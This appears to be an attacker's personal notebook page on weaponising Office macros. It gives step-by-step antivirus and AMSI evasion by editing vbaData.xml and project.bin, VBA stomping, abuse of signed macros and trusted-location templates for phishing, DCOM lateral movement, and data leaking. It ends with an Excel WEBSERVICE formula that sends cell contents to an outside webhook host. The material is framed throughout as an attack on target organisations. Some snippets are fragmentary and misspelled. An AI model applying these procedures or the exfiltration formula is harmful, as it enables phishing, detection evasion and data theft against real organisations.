# Macros / VBA

{% embed url="<https://bettersolutions.com/vba/ribbon/OfficeCustomUIEditorFiles.zip>" %}

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FVtokjgnoxTOupcPp2rul%2Fimage.png?alt=media&#x26;token=d6e03248-919a-4126-a0ff-4be70daee9f3" alt=""><figcaption></figcaption></figure>

"MacroName=" to check if autoopen is enabled and wne:name to execute the autoopen

Macros = more than VBA - Excel 4.0 (XLM, only in Excel)&#x20;

VBA has 2 intermediary languages - P-Code and Exe-Code

Every module stream start with PerformanCache (should be empty)&#x20;

good success steps:

1. abuse ambiguity in specs (e.g. ascii and unicode name fields pointing to same module stream)&#x20;
2. explore undocumented feature (Ctrl-F in specs for "must be ignored and "must not be present" )
3. try deviating from specs

## AV Bypass:

#### Add AutoOpen:&#x20;

1. open in 7zip > word > vbaData.xml
2. Change name in MacroName to name.AUTOOPEN
3. Extract project.bin and load into flexHex
4. Select stream/module name and press ctrl-x which removes the project stream from the bin file,&#x20;
5. drop back into 7zip and replace old

#### Stop VBA reader from viewing:

1. download the project.bin again in 7zip
2. open in FlexHex as a normal file&#x20;
3. keep the magic bytes of the file, over write some of the data (basically to crash the bin when it gets executed) &#x20;

{% embed url="<https://vbastomp.com>" %}

Mark of the Web and Trust:&#x20;

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FNxvYn8EVoUFlOcVKgIN8%2Fimage.png?alt=media&#x26;token=323ebf06-8452-445a-82e5-cf1aef38cf54" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FB4bwVkERgivLrVGfcALy%2Fimage.png?alt=media&#x26;token=f9c23574-f97c-4749-b94e-323fef688c6e" alt=""><figcaption></figcaption></figure>

If we have a file from the target also, we can use the signing from that file to inject our payload into

### Signature Abuse:&#x20;

SOME ORGS USE 'MAILMERGE' FROM AN EXCEL ADDRESS LIST TO AUTOMATE WORK AND SEND PERSONALISED LETTERS

if a document is signed, we can execute VBA thats already signed (if enabled by the company)&#x20;

in excel also, to avoid static anaylsis call the VBA function within a cell i.e. =PrintDocument()

we can then within the word document create a new macro called autoopen(), and re run the code it will automatically execute - avoiding all detection

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2Flkzuvn4YnygOAcUiOMZu%2Fimage.png?alt=media&#x26;token=74062ff8-0a15-42eb-b73a-5d7ed8839b57" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FxZog3LnyVEVnwWoaph65%2Fimage.png?alt=media&#x26;token=88e21189-5fa3-4ce5-930c-42f711bb430f" alt=""><figcaption></figcaption></figure>

COM/DCOM exploit:&#x20;

## Trusted location:&#x20;

use trusted location to host template, reference that template in a doc used to phish

This method avoids all macros settings, AMSI and all security settings within office

{% embed url="<https://netero1010-securitylab.com/evasion/execution-of-remote-vba-script-in-excel>" %}

Lateral movement - System a, admin to system b - start excel via dcom and force excel on system b to execute a excel doc&#x20;

$a = \[System.Activator]::CrteateInstance(\[type]:

$a.REgisterXLL("C:\FilePath\\")

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FWjvybLfWrzTTbAxd8rRg%2Fimage.png?alt=media&#x26;token=e9c68052-bf78-42cd-8ae0-bc891f8a5259" alt=""><figcaption></figcaption></figure>

PST extension normally disregarded by AV&#x20;

Playing with fields:&#x20;

1. open document -> insert -> fields
2. MacroButton ->&#x20;

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2F1nwUInA02cOahfk0IJs9%2Fimage.png?alt=media&#x26;token=44e5b56d-b55c-46ad-99ba-299030e42fe8" alt=""><figcaption></figcaption></figure>

information leaking via DNS ->&#x20;

Get data from folder

refresh -> connection properties -> refresh on open etc

Navigate to Advanced Editor -> res=Table.SelectRows(Source, each(Text.ContainsName, "dll")

call home:

```excel-formula
=webservice("https://webhook.site/APIkey?"&encodeurl(A1))
```